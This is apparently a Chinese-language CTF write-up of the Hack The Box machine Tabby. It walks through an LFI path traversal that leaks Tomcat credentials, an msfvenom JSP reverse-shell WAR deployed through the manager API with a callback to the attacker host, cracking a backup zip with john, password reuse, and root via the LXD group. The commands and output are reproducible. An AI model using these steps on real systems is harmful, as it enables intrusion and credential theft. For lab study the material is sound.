免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
查看开启端口
┌──(rootkali)-[~/htb/Tabby]└─# nmap -p- 10.10.10.194 --open Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:22 ESTNmap scan report for 10.10.10.194Host is up (0.25s latency).Not shown: 64733 closed ports, 799 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open http8080/tcp open http-proxyNmap done: 1 IP address (1 host up) scanned in 249.82 seconds端口详细信息
┌──(rootkali)-[~/htb/Tabby]└─# nmap -sV -T4 -A -O 10.10.10.194 -p 22,80,8080 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:33 ESTNmap scan report for 10.10.10.194Host is up (0.29s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-server-header: Apache/2.4.41 (Ubuntu)|_http-title: Mega Hosting8080/tcp open http Apache Tomcat|_http-open-proxy: Proxy might be redirecting requests|_http-title: Apache TomcatWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 8080/tcp)HOP RTT ADDRESS1 292.67 ms 10.10.14.12 293.43 ms 10.10.10.194OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.08 seconds有两个http服务,80是apache,8080是tomcat
80端口
80端口关上当前,在NEWS栏发现导航到了http://megahosting.htb/news.php?file=statement"
把megahosting.htb增加到本地host文件
echo "10.10.10.194 megahosting.htb" >> /etc/hosts
NEWS网页显示:
We apologise to all our customers for the previous data breach.
We have changed the site to remove this tool, and have invested heavily in more secure servers
已经产生过信息泄露,哦?
留意到url里file这个参数,貌似是一个文件名,输出http://megahosting.htb/news.php?file=../../../../../etc/passwd
胜利回显靶机/etc/passwd内容,证实存在LFI
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:106::/nonexistent:/usr/sbin/nologinsyslog:x:104:110::/home/syslog:/usr/sbin/nologin_apt:x:105:65534::/nonexistent:/usr/sbin/nologintss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/falseuuidd:x:107:112::/run/uuidd:/usr/sbin/nologintcpdump:x:108:113::/nonexistent:/usr/sbin/nologinlandscape:x:109:115::/var/lib/landscape:/usr/sbin/nologinpollinate:x:110:1::/var/cache/pollinate:/bin/falsesshd:x:111:65534::/run/sshd:/usr/sbin/nologinsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/falsetomcat:x:997:997::/opt/tomcat:/bin/falsemysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/falseash:x:1000:1000:clive:/home/ash:/bin/bash存在一个普通用户ash
对于不存在,或者没有权限的文件,页面不会有任何返回。
8080端口服务
在8080端口首页,暴露出了一些信息,联合80端口的LFI,兴许能搞点事件
It works !If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.htmlTomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.You might consider installing the following packages, if you haven't already done so:tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.裸露进去网页根目录的门路:/var/lib/tomcat9/webapps/ROOT/
http://10.10.10.194:8080/docs/显示tomcat版本是Version 9.0.31
显示治理用户配置文件在/etc/tomcat9/tomcat-users.xml,然而无奈显示
在本机搭建了一个同样版本的tomcat,资源在这里
查看目录构造
┌──(rootkali)-[/var/lib/tomcat9]└─# lsbin BUILDING.txt conf CONTRIBUTING.md lib LICENSE logs NOTICE README.md RELEASE-NOTES RUNNING.txt temp webapps workconf
┌──(rootkali)-[/var/lib/tomcat9/conf]└─# lscatalina.policy catalina.properties context.xml jaspic-providers.xml jaspic-providers.xsd logging.properties server.xml tomcat-users.xml tomcat-users.xsd web.xmlconf文件夹应该跟webapps在同一级,然而浏览器上始终无奈回显。。。
查看本地tomcat9,如同没啥文件有读权限的。
curl
起初看论坛提醒,要间接用apt install tomcat9装置
查看tomcat-users.xml地位
┌──(rootkali)-[~/htb/Tabby]└─# find / -name tomcat-users.xml/etc/tomcat9/tomcat-users.xml/usr/share/tomcat9/etc/tomcat-users.xml/etc/tomcat9/tomcat-users.xml 普通用户没有读取权限
┌──(rootkali)-[~/htb/Tabby]└─# ls -alh /etc/tomcat9/tomcat-users.xml -rw-r----- 1 root tomcat 2.7K 11月 10 03:15 /etc/tomcat9/tomcat-users.xml然而/usr/share/tomcat9/etc/tomcat-users.xml普通用户是可读的
┌──(rootkali)-[~/htb/Tabby]└─# ls -alh /usr/share/tomcat9/etc/tomcat-users.xml -rw-r--r-- 1 root root 2.7K 11月 10 03:15 /usr/share/tomcat9/etc/tomcat-users.xml应用paylaodhttp://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml用网页关上,须要关上网页源代码能力显示配置
然而用curl能够马上回显
curl -X GET -H 'Content-type:text/xml' http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml
tomcat-users.xml配置信息
<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <role rolename="admin-gui"/> <role rolename="manager-script"/> <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/></tomcat-users>失去一个tomcat的后盾账号:tomcat:$3cureP4s5w0rd123!
然而这个权限只是admin-gui和manager-script,不是manager-gui,因而咱们无奈关上manger页面,无奈应用exp
然而起初发现应用 curl是能够拜访到manager的后盾文件的
┌──(rootkali)-[~/htb/Tabby]└─# curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/listOK - Listed applications for virtual host [localhost]/:running:0:ROOT/examples:running:0:/usr/share/tomcat9-examples/examples/host-manager:running:2:/usr/share/tomcat9-admin/host-manager/manager:running:0:/usr/share/tomcat9-admin/manager/docs:running:0:/usr/share/tomcat9-docs/docs参考hacktricks里的办法
编译反弹shellmsfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4242 -f war -o revshell.war
上传反弹shell
┌──(rootkali)-[~/htb/Tabby]└─# curl --upload-file revshell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/revshell"OK - Deployed application at context path [/revshell]浏览器关上:http://10.10.10.194:8080/revshell/
拿到反弹shell
┌──(rootkali)-[~/htb/Tabby]└─# nc -lnvp 4242listening on [any] 4242 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.194] 50070iduid=997(tomcat) gid=997(tomcat) groups=997(tomcat)user
在/var/www/html/files找到一个加密zip文件16162020_backup.zip
下载到本地后用zip2john转成john能够辨认的格局
┌──(rootkali)-[~/htb/Tabby]└─# /usr/sbin/zip2john 16162020_backup.zip >zip.hash 16162020_backup.zip/var/www/html/assets/ is not encrypted!ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression typever 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression typever 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45Fver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19Ever 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3NOTE: It is assumed that all files in each archive have the same password.If that is not the case, the hash may be uncrackable. To avoid this, useoption -o to pick a file at a time.破解获取到一个明码
┌──(rootkali)-[~/htb/Tabby]└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash Using default input encoding: UTF-8Loaded 1 password hash (PKZIP [32/64])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusadmin@it (16162020_backup.zip)1g 0:00:00:01 DONE (2021-12-31 03:15) 0.7246g/s 7509Kp/s 7509Kc/s 7509KC/s adnc153..adenabuckUse the "--show" option to display all of the cracked passwords reliablySession completed解密zip
┌──(rootkali)-[~/htb/Tabby]└─# unzip 16162020_backup.zipArchive: 16162020_backup.zip[16162020_backup.zip] var/www/html/favicon.ico password: inflating: var/www/html/favicon.ico creating: var/www/html/files/ inflating: var/www/html/index.php extracting: var/www/html/logo.png inflating: var/www/html/news.php inflating: var/www/html/Readme.txt然而没有找到任何有用的文件,尝试 应用破解的明码登陆ash的账号
tomcat@tabby:~$ su ashsu ashPassword: admin@itash@tabby:/opt/tomcat$ id iduid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)ash@tabby:/opt/tomcat$ whoamiwhoamiash胜利了。
root
查看组用户信息,发现ash账号在lxd用户组
ash@tabby:/var/lib/tomcat9$ ididuid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)依照hacktricksMethod 2里的提权办法
kali端:
下载仓库到本地
git clone https://github.com/saghul/lxd-alpine-builder
编译:
cd lxd-alpine-buildersed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpinesudo ./build-alpine -a i686攻击机用python开启一个http服务,传编译好的镜像文件到靶机
wget http://10.10.16.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
靶机端加载靶机,初始化。留神:此操作不能在/tmp目录下执行,只能在/home/ash/下
ash@tabby:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage<e-v3.13-x86_64-20210218_0139.tar.gz --alias myimageash@tabby:~$ lxd init一路按默认。
提权到root
ash@tabby:~$ lxc init myimage mycontainer -c security.privileged=truelxc init myimage mycontainer -c security.privileged=trueCreating mycontainerash@tabby:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true<ydevice disk source=/ path=/mnt/root recursive=trueDevice mydevice added to mycontainerash@tabby:~$ lxc start mycontainerlxc start mycontainerash@tabby:~$ lxc exec mycontainer /bin/shlxc exec mycontainer /bin/sh~ # ^[[50;5Rididuid=0(root) gid=0(root)~ # ^[[50;5Rwhoamiwhoamiroot找到root.txt
~ # ^[[50;5Rfind / -name root.txtfind / -name root.txt/mnt/root/root/root.txt总结
Foothold是最难的局部,如果不明确tomcat的配置,不应用curl探测就无奈拿到初始shell。hacktricks真是咱们的好敌人!没有思路的时候肯定要经常看看。
user很简略。
提权到root时,一开始在/tmp目录操作始终报错说找不到镜像文件的门路。起初想想docker里这些门路可能会有些奇怪
尝试从lxd管理员ash的家目录加载,终于胜利了。